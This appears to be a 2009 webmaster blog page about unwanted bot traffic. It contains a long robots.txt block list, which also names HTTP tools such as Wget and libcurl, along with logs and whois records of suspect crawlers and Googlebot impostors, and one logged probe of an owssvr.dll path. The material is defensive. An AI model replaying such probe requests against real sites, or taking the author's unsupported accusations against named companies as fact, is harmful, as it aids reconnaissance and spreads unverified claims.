Disallow: /

User-Agent: Trident
Disallow: /

User-Agent: uw_cse_xwc
Disallow: /

User-Agent: ZupeeCrawler
Disallow: /

User-Agent: Webspider
Disallow: /

User-Agent: LinkAider
Disallow: /

User-Agent: Axonize-bot
Disallow: /

User-Agent: ips-agent
Disallow: /

User-Agent: RiceComputerArchitecture
Disallow: /

User-Agent: AISearchBot
Disallow: /

User-Agent: flatlandbot
Disallow: /

User-Agent: FairShare
Disallow: /

User-Agent: SapphireWebCrawler
Disallow: /

User-Agent: LocalBot
Disallow: /

User-Agent: LaBot
Disallow: /

User-Agent: Butterfly
Disallow: /

User-Agent: robotgenius
Disallow: /

User-Agent: WillyBot
Disallow: /

User-Agent: GingerCrawler
Disallow: /

User-Agent:larbin
Disallow: /

User-Agent: ru_com_viewer
Disallow: /

User-Agent:Yandex
Disallow: /

User-Agent:yandex
Disallow: /

User-Agent:msnbot-media
Disallow: /

Sitemap: http://www.rainierrhododendrons.com/sitemap.xml

User-Agent:del.icio.us
Disallow: /

User-Agent:Sika
Disallow: /

User-Agent:whois.de
Disallow: /

User-Agent:Isidorus
Disallow: /

User-Agent:Yanga
Disallow: /

User-Agent:MSR-ISRCCrawler
Disallow: /

User-Agent:Snappybot
Disallow: /

User-Agent:Gaisbot
Disallow: /

User-Agent:SapphireWebCrawler
Disallow: /

User-Agent:BobCrawl
Disallow: /

User-Agent:OpenX
Disallow: /

User-Agent:Axonize-bot
Disallow: /

User-Agent:KaloogaBot
Disallow: /

User-Agent:kalooga
Disallow: /

User-Agent:OnTownsBot
Disallow: /

User-Agent:Cazoodle-Bot
Disallow: /

User-Agent: REAP-Crawler
Disallow: /

User-Agent: DotBot
Disallow: /

User-Agent: Gigabot
Disallow: /

User-Agent: NetcraftSurveyAgent
Disallow: /

User-Agent: SurveyBot
Disallow: /

User-Agent: DBLBot
Disallow: /

User-Agent: AISearchBot
Disallow: /

User-Agent: Charlotte
Disallow: /

User-agent: IntegraTelecom
Disallow: /

User-agent: PSIBots
Disallow: /

User-agent:Websense
Disallow: /

User-agent:HornySexSearch
Disallow: /

User-agent: SnapPreviewBot
Disallow: /

User-agent: Snoopy
Disallow: /

User-agent: libwww-perl
Disallow: /

User-agent: nexen
Disallow: /

User-agent: phpversion
Disallow: /

User-agent: attributor
Disallow: /

User-agent: Java
Disallow: /

User-agent: bsalsa
Disallow: /

User-agent: whoisde.de
Disallow: /

User-agent: envolk
Disallow: /

User-agent: QEAVis
Disallow: /

User-agent: NextGenSearchBot
Disallow: /

User-agent: boitho.com
Disallow: /

User-agent: boitho
Disallow: /

User-agent: Wget
Disallow: /

User-agent: Rankivabot
Disallow: /

User-agent: T-Online Browser
Disallow: /

User-agent: webalta
Disallow: /

User-agent: page_prefetcher
Disallow: /

User-agent: cyberpatrol
Disallow: /

User-agent: sitecat
Disallow: /

User-agent: cyberpatrolcrawler
Disallow: /

User-agent: internetseer
Disallow: /

User-agent: searchme
Disallow: /

User-agent: dcbot
Disallow: /

User-agent: scoutjet
Disallow: /

User-agent: sphsearch
Disallow: /

User-agent: exabot
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: naverbot
Disallow: /

User-agent: twiceler
Disallow: /

User-agent: zermelo
Disallow: /

User-agent: Moozilla
Disallow: /

User-agent: kyluka
Disallow: /

User-agent: scoutjet
Disallow: /

User-agent: baiduspider
Disallow: /

User-agent: MLBot
Disallow: /

User-agent: worio
Disallow: /

User-agent: turnitinbot
Disallow: /

User-agent: exooba
Disallow: /

User-agent: ViolaBot
Disallow: /

User-agent: speedyspider
Disallow: /

User-agent: becomebot
Disallow: /

# disallow Googlebot-Image
User-agent: Googlebot-Image
Disallow: /

User-agent: MJ12bot
Disallow: /

User-agent: QEAVis
Disallow: /

User-agent: VWBot
Disallow: /

User-agent: ShopWiki
Disallow: /

User-agent: SnapPreviewBot
Disallow: /

User-agent: panscient.com
Disallow: /

User-agent: panscient
Disallow: /
User-agent: sproose
Disallow: /

User-agent: voyager
Disallow: /

User-agent: grub
Disallow: /

User-agent: libwww-perl
Disallow: /

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: Twiceler
Disallow: /

User-agent: WebDataCentreBot
Disallow: /

User-agent: OOZBOT
Disallow: /

User-agent: setooz
Disallow: /

User-agent: bsalsa
Disallow: /

User-agent: perl
Disallow: /

User-agent: botmobi
Disallow: /

User-agent: NextGenSearchBot
Disallow: /

User-agent: ASPSimply
Disallow: /

User-agent: Python-urllib
Disallow: /

User-agent: Moozilla
Disallow: /

User-agent: voilabot
Disallow: /

User-agent: WGet
Disallow: /

User-agent: obot
Disallow: /

User-agent: Java
Disallow: /

User-agent: libcurl-agent
Disallow: /

User-agent: phpversion
Disallow: /

User-agent: therarestparser
Disallow: /

User-agent: Jakarta Commons-HttpClient
Disallow: /

FollowSiteBot

The FollowSiteBot...

Not checking robots.txt like a good little bot...

FollowSiteBot came from this network today: 74.86.223.42

SoftLayer Technologies Inc. SOFTLAYER-4-4 (NET-74-86-0-0-1)
74.86.0.0 - 74.86.255.255
ASX Networks ApS NET-74-86-223-40 (NET-74-86-223-40-1)
74.86.223.40 - 74.86.223.47

uberbot - misbehaving

uberbot is not obeying robots.txt

Today's Bot Traffic - a lot of Twitter Referrals

We got hit with a lot of bots today. It seems that a great deal of this may be caused by Twitter posts.

14 174.129.124.97 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
13 67.202.8.12 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
12 75.101.139.240 Python-urllib/1.17 GET 6 2009 10
11 174.129.123.212 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
8 216.24.131.119 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Me.dium/1.0 (http://me.dium.com) GET 6 2009 10
8 216.24.131.119 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Me.dium/1.0 (http://me.dium.com) HEAD 6 2009 10
6 64.73.66.94 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618) GET 6 2009 10
6 195.210.57.83 Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler) GET 6 2009 10
6 130.76.32.16 Mozilla/4.0 (compatible;) GET 6 2009 10
5 216.100.200.126 Mozilla/4.0 (compatible;) GET 6 2009 10
3 130.76.32.181 Mozilla/4.0 (compatible;) GET 6 2009 10
3 174.129.168.229 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
2 174.129.118.37 Python-urllib/2.5 GET 6 2009 10
2 208.74.66.43 libwww-perl/5.825 GET 6 2009 10
2 174.129.89.199 Python-urllib/2.5 GET 6 2009 10
2 67.220.192.206 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 (.NET CLR 3.5.30729) GET 6 2009 10
2 67.112.74.47 Mozilla/4.0 (compatible;) GET 6 2009 10
1 67.202.58.81 rdfbot/1.0 (rdfbotsupport AT rediffmailpro DOT com) GET 6 2009 10
1 69.58.178.33 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7 GET 6 2009 10
1 67.23.27.247 Nambu URL Destination Determinator +bot http://nambu.com GET 6 2009 10
1 67.23.27.250 Nambu URL Destination Determinator +bot http://nambu.com GET 6 2009 10
1 75.101.178.247 Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) GET 6 2009 10
1 174.129.224.58 PycURL/7.19.0 GET 6 2009 10
1 174.129.104.29 Python-urllib/2.5 GET 6 2009 10
1 174.129.223.229 uberbot 1.0 HEAD 6 2009 10

Twitturly - bad bot on Amazon network

Whatever Twitturly is it is not obeying robots.txt. It came from the Amazon network at this IP address: 174.129.88.144

Additionally it came in conjunction with a number of other bots that hit this particular site at the same time. I assume it was because the web site owner posted her site somewhere that is being monitored by bots. Unfortunately the bots seem to be misbehaving.

LocalBot not checking Robots.txt

Something coming from this IP: 121.138.194.106 called LocalBot is not checking robots.txt files. Annoying.

Tons of hits from 204.16.231.98 - Sparkplug, Inc.

Not sure why but our web sites are getting what seems to be an excessive number of hits from the Sparplug, Inc. network in Chicago.

The particular IP address doing the traffic generation is: 204.16.231.98

OrgName: Sparkplug, Inc.
OrgID: SPARK-3
Address: 303 W. Erie
Address: Suite 300
City: Chicago
StateProv: IL
PostalCode: 60610
Country: US
NetRange: 204.16.228.0 - 204.16.231.255

The traffic hitting our server seems to be focused on a particular web site that servers local customers for the particular business - who are not in Chicago.

Maybe this is just someone admiring the work on our web sites, I am not sure...seems a little odd however.

VeriSign - unwanted traffic

Why is Verisign hitting our sites repeatedly with unwanted traffic?

This IP address: 69.58.178.33 was hitting our a site repeatedly from 6/8/2009 8:19:33 PM to 6/8/2009 8:19:57 PM.

So what? The site is advertising the sale of Christmas wreaths and this is JUNE. It's the middle of the summer and obviously no one at Verisign is interested in buying Christmas wreaths.

The IP or computer/server at Verisign scanned this site and hit 25 different pages. Obviously this is not someone reviewing the site to buy something and obviously there is some automated software on this server at Verisign doing something on our servers - who know for what or why. It definitely was not for any service requested by us.

Here's the Verisign network in question:

OrgName: VeriSign Infrastructure & Operations
OrgID: VIO-2
Address: 21345 Ridgetop Circle
City: Dulles
StateProv: VA
PostalCode: 20166
Country: US
NetRange: 69.58.176.0 - 69.58.191.255

Norton - Update Not Working?

I set up Norton Anti-Virus on a new machine recently and when I did, I noticed that it looked different than the version of Norton running on my other machine. I installed Norton on this other machine probably close to a year ago but I have updated it regularly since then.

So is the problem that Norton Antivirus is not actually updating or if you have an old version they just leave parts of it in tact so it doesn't look completely like the new version?

With this and my last post about Adobe Acrobat - seems like you may want to frequently uninstall and reinstall certain software that may have been affected by malware or viruses.

Perhaps vendors also need a better way for vendors to verify their update process is working.

Adobe Acrobat Reader - Update Not Working?

I typically update all my software fairly regularly. I noticed a while ago that I have an old version of Adobe Acrobat Reader even after doing the updates many times. I finally I decided to uninstall Adobe Acrobat Reader 8.something so I could install the latest version.

I was reminded that I need to do this when I went to the Secunia web site and saw the latest Adobe Acrobat Reader advisory - which unfortunately includes version 9:

Adobe Acrobat Reader - Memory Corruption Vulnerability

This particular vulnerability above is only confirmed for Linux but chances are it occurs on other operating systems as well.

Additionally recently someone I know was using Adobe and some rogue JavaScript code caused him some problems on one of his machines - which is how I got into look at the whole Adobe Acrobat Reader update problem in the first place.

Interestingly enough, after uninstalling Adobe Acrobat Reader version 8, I try to go to the Adobe web site and when I click the link to install the most recent version of Adobe I got an error saying my IP was blocked. Ok so I'll just jump on a different network. That IP was blocked too. Ok that's odd. I went to a completely different machine and was able to click the download link. So I came back to document all of this in my blog - and suddenly now I can download again.

One thing I don't like about Adobe's web site is that the download is in HTTP, not HTTPS. How do we know files and bits and bytes aren't getting altered in transit?

Rundll.exe and task manager

When I pulled up task manager a process - I think using rundll.exe was running and disappeared shortly after opening the task manager. I have noticed a lot of times when I open the task manager whatever was hung up on my computer suddenly starts working. This leads me to wonder if some malware is designed to automatically shut off if the task manager is opened as users are getting hip to the fact that extraneous processes running could mean trouble...

Would be nice to have a button in task manager to easily get to some log of what was recently running on your computer as well as what is currently running.

Malware - DigExt?

Had a user cross our site today that hit our site with numerous bad URLs obviously looking for some type of hack.

Time/Date: 6/4/2009 9:04:23 PM
The user agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)
IP Address: 204.16.231.98

They came from this network:

OrgName: Sparkplug, Inc.
OrgID: SPARK-3
Address: 303 W. Erie
Address: Suite 300
City: Chicago
StateProv: IL
PostalCode: 60610
Country: US

ReferralServer: rwhois://rwhois.sparkplugbb.net:4321/

NetRange: 204.16.228.0 - 204.16.231.255

Hotstocked.com - RateItAll

Had problems with web sites posting incorrect or harmful information about you and having a problem getting it removed?

You can post your comments about these web sites at RateItAll.com

For instance someone I know is having problems getting their name removed from HotStocked.com which has posted a lot of incorrect information about people and refuses to remove it upon request.

Add your comments about HotStocked.com:
http://www.rateitall.com/i-995297-hotstockedcom.aspx

For an example of the type of posts you'll find on Hotstocked.com which are derogatory and probably personal attacks and altercations rather than useful information, search the site for negative postings about people and requests for removal that have not been granted. I'm sure you'll quickly find what that Hotstocked.com is full of spammy, personal content and most likely fabricated information about people posted by those who dislike them for whatever reason.

Moozilla

We get repeated hits from a user agent called Moozilla. The hits will come from a bunch of different IP addresses on the Netscape/AOL network in succession. Sample hits:

6/1/2009 17:46 207.200.116.73 Moozilla
6/1/2009 17:46 207.200.116.131 Moozilla
6/1/2009 17:46 207.200.116.135 Moozilla
6/1/2009 17:46 207.200.116.136 Moozilla
6/1/2009 17:46 207.200.116.5 Moozilla
6/1/2009 17:46 207.200.116.12 Moozilla
6/1/2009 17:46 207.200.116.135 Moozilla
6/1/2009 17:46 207.200.116.136 Moozilla
6/1/2009 17:46 207.200.116.5 Moozilla
6/1/2009 17:46 207.200.116.12 Moozilla
6/1/2009 17:46 207.200.116.67 Moozilla
6/1/2009 17:46 207.200.116.6 Moozilla
6/1/2009 17:46 207.200.116.65 Moozilla

We have sent specific messaging back to this bot or software and contacted AOL about the problem but the particular traffic continues. When this particular software hits, it generates hundreds of hits on our web site in succession and does not behave like a normal web user.

The network reported generating this traffic is Netscape (now owned by AOL).

OrgName: Netscape Communications Corp.
OrgID: NSCP
Address: 501 E. Middlefield
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

NetRange: 207.200.64.0 - 207.200.127.255

SurveyBot - Compass Communications

The SurveyBot from Whois.sc hosted at Compass Communications, apparently located at the Westin Building in Seattle is not obeying our robots.txt files.

OrgName: Compass Communications, Inc.
OrgID: CPCM
Address: 2001 6th Avenue
Address: Suite 3205
City: Seattle
StateProv: WA
PostalCode: 98121
Country: US

NetRange: 216.145.0.0 - 216.145.31.255

Some others have been asking about this particular bot on forums:

Compass Communications

I do not particularly appreciate the fact that they scrape web content during their visits.

Another Google Bot Impostor

Just got hit by another Google bot impostor:

216.240.151.50
6/2/2009 4:20:59 PM
Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)


OrgName: ATMLINK, INC.
OrgID: ATMLIN
Address: 600 W. 7th Street
Address: Suite 360
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US

NetRange: 216.240.128.0 - 216.240.159.255

AT&T Wireless Doesn't Report Accurate Location

Interesting - Using AT&T Wireless card in Seattle reports an IP address that makes it look like I'm in Florida.

OrgName: AT&T Global Network Services, LLC
OrgID: ATGS
Address: 3200 Lake Emma Road
City: Lake Mary
StateProv: FL
PostalCode: 32746
Country: US

NetRange: 32.0.0.0 - 32.255.255.255

More Google Imposters

It appears (unless Google has Google bots in the cloud and on various little networks all over the place which I doubt after looking up these particular IP address networks) that there are some Googlebot impersonators out there. It would seem that this is really an impersonator because not only are these requests not coming from Google networks, they seem to only be interested in a few sites, not all the sites on our server. They are particularly interested in travel and real estate web sites. check your logs...if the IP address for Googlebots are not coming from Google networks - you probably want to block them from viewing your web sites. They can only be up to no good.

Here are the Google impostor IP addresses:

2 2009 5 12.20.32.67 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 151.84.166.1 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
8 2009 5 209.7.26.158 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
25 2009 5 216.177.164.100 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 216.240.151.50 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
152 2009 4 24.44.206.249 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 65.213.90.26 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
87 2009 4 68.238.131.215 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 4 69.116.160.44 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 69.116.160.44 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 69.70.64.94 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 70.101.224.174 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 71.116.210.34 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
79 2009 4 71.43.155.145 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
2 2009 4 74.169.43.199 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 4 74.243.24.159 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
57 2009 4 74.243.25.64 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
10 2009 5 75.146.149.53 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
1 2009 5 76.249.223.78 Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)

Google Impostor - CoreExpress

There's a Google impostor in our logs - unless Google is on the Core Express network.

On 3/4/2009 4:47:01 AM someone at this IP address: 64.69.46.217 was putting GoogleBot in their user agent.

OrgName: CoreExpress
OrgID: COEX
Address: 600 W. 7th Street
Address: Suite 360
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US

NetRange: 64.69.32.0 - 64.69.47.255

owssvr.dll - attempted access

This IP: 71.112.91.22 on the Verizon network was trying to access an IE component on our site that does not exist:

/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211&STRMVER=4&CAPREQ=0

Robots.txt - More bots than people

Is your web site getting more hits from bots than people? You might want to try this in your robots.txt file. It blocks out a lot of bots we've seen but not major search engines. Alter as desired:

User-Agent: OnTownsBot
Disallow: /

User-Agent: ServageRobot
Disallow: /

User-Agent: uw_cse_xwc
Disallow: /

User-Agent: ZupeeCrawler
Disallow: /

User-Agent: uberbot
Disallow: /

User-Agent: Axonize-bot
Disallow: /

User-Agent: ips-agent
Disallow: /

User-Agent: RiceComputerArchitecture
Disallow: /

User-Agent: AISearchBot
Disallow: /

User-Agent: flatlandbot
Disallow: /

User-Agent: FairShare
Disallow: /

User-Agent: SapphireWebCrawler
Disallow: /

User-Agent: LocalBot
Disallow: /

User-Agent: LaBot
Disallow: /

User-Agent: Butterfly
Disallow: /

User-Agent: robotgenius
Disallow: /

User-Agent: WillyBot
Disallow: /

User-Agent: GingerCrawler
Disallow: /

User-Agent:larbin
Disallow: /

User-Agent: ru_com_viewer
Disallow: /

User-Agent:Yandex
Disallow: /

User-Agent:yandex
Disallow: /

User-Agent:msnbot-media
Disallow: /

Sitemap: http://www.rainierrhododendrons.com/sitemap.xml

User-Agent:del.icio.us
Disallow: /

User-Agent:Sika
Disallow: /

User-Agent:whois.de
Disallow: /

User-Agent:Isidorus
Disallow: /

User-Agent:Yanga
Disallow: /

User-Agent:MSR-ISRCCrawler
Disallow: /

User-Agent:Snappybot
Disallow: /

User-Agent:Gaisbot
Disallow: /

User-Agent:SapphireWebCrawler
Disallow: /

User-Agent:BobCrawl
Disallow: /

User-Agent:OpenX
Disallow: /

User-Agent:Axonize-bot
Disallow: /

User-Agent:KaloogaBot
Disallow: /

User-Agent:kalooga
Disallow: /

User-Agent:OnTownsBot
Disallow: /

User-Agent:Cazoodle-Bot
Disallow: /

User-Agent: REAP-Crawler
Disallow: /

User-Agent: DotBot
Disallow: /

User-Agent: Gigabot
Disallow: /

User-Agent: NetcraftSurveyAgent
Disallow: /

User-Agent: SurveyBot
Disallow: /

User-Agent: DBLBot
Disallow: /

User-Agent: AISearchBot
Disallow: /

User-Agent: Charlotte
Disallow: /

User-agent: IntegraTelecom
Disallow: /

User-agent: PSIBots
Disallow: /

User-agent:Websense
Disallow: /

User-agent:HornySexSearch
Disallow: /

User-agent: SnapPreviewBot
Disallow: /

User-agent: Snoopy
Disallow: /

User-agent: libwww-perl
Disallow: /

User-agent: nexen
Disallow: /

User-agent: phpversion
Disallow: /

User-agent: attributor
Disallow: /

User-agent: Java
Disallow: /

User-agent: bsalsa
Disallow: /

User-agent: whoisde.de
Disallow: /

User-agent: envolk
Disallow: /

User-agent: QEAVis
Disallow: /

User-agent: NextGenSearchBot
Disallow: /

User-agent: boitho.com
Disallow: /

User-agent: boitho
Disallow: /

User-agent: Wget
Disallow: /

User-agent: Rankivabot
Disallow: /

User-agent: T-Online Browser
Disallow: /

User-agent: webalta
Disallow: /

User-agent: page_prefetcher
Disallow: /

User-agent: cyberpatrol
Disallow: /

User-agent: sitecat
Disallow: /

User-agent: cyberpatrolcrawler
Disallow: /

User-agent: internetseer
Disallow: /

User-agent: searchme
Disallow: /

User-agent: dcbot
Disallow: /

User-agent: scoutjet
Disallow: /

User-agent: sphsearch
Disallow: /

User-agent: exabot
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: naverbot
Disallow: /

User-agent: twiceler
Disallow: /

User-agent: zermelo
Disallow: /

User-agent: Moozilla
Disallow: /

User-agent: kyluka
Disallow: /

User-agent: scoutjet
Disallow: /

User-agent: baiduspider
Disallow: /

User-agent: MLBot
Disallow: /

User-agent: worio
Disallow: /

User-agent: turnitinbot
Disallow: /

User-agent: exooba
Disallow: /

User-agent: ViolaBot
Disallow: /

User-agent: speedyspider
Disallow: /

User-agent: becomebot
Disallow: /

# disallow Googlebot-Image
User-agent: Googlebot-Image
Disallow: /

User-agent: MJ12bot
Disallow: /

User-agent: QEAVis
Disallow: /

User-agent: VWBot
Disallow: /

User-agent: ShopWiki
Disallow: /

User-agent: SnapPreviewBot
Disallow: /

User-agent: panscient.com
Disallow: /

User-agent: panscient
Disallow: /
User-agent: sproose
Disallow: /

User-agent: voyager
Disallow: /

User-agent: grub
Disallow: /

User-agent: libwww-perl
Disallow: /

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: Twiceler
Disallow: /

User-agent: WebDataCentreBot
Disallow: /

User-agent: OOZBOT
Disallow: /

User-agent: setooz
Disallow: /

User-agent: bsalsa
Disallow: /

User-agent: perl
Disallow: /

User-agent: botmobi
Disallow: /

User-agent: NextGenSearchBot
Disallow: /

User-agent: ASPSimply
Disallow: /

User-agent: Python-urllib
Disallow: /

User-agent: Moozilla
Disallow: /

User-agent: voilabot
Disallow: /

User-agent: WGet
Disallow: /

User-agent: obot
Disallow: /

User-agent: Java
Disallow: /

User-agent: libcurl-agent
Disallow: /

User-agent: phpversion
Disallow: /

User-agent: therarestparser
Disallow: /

User-agent: Jakarta Commons-HttpClient
Disallow: /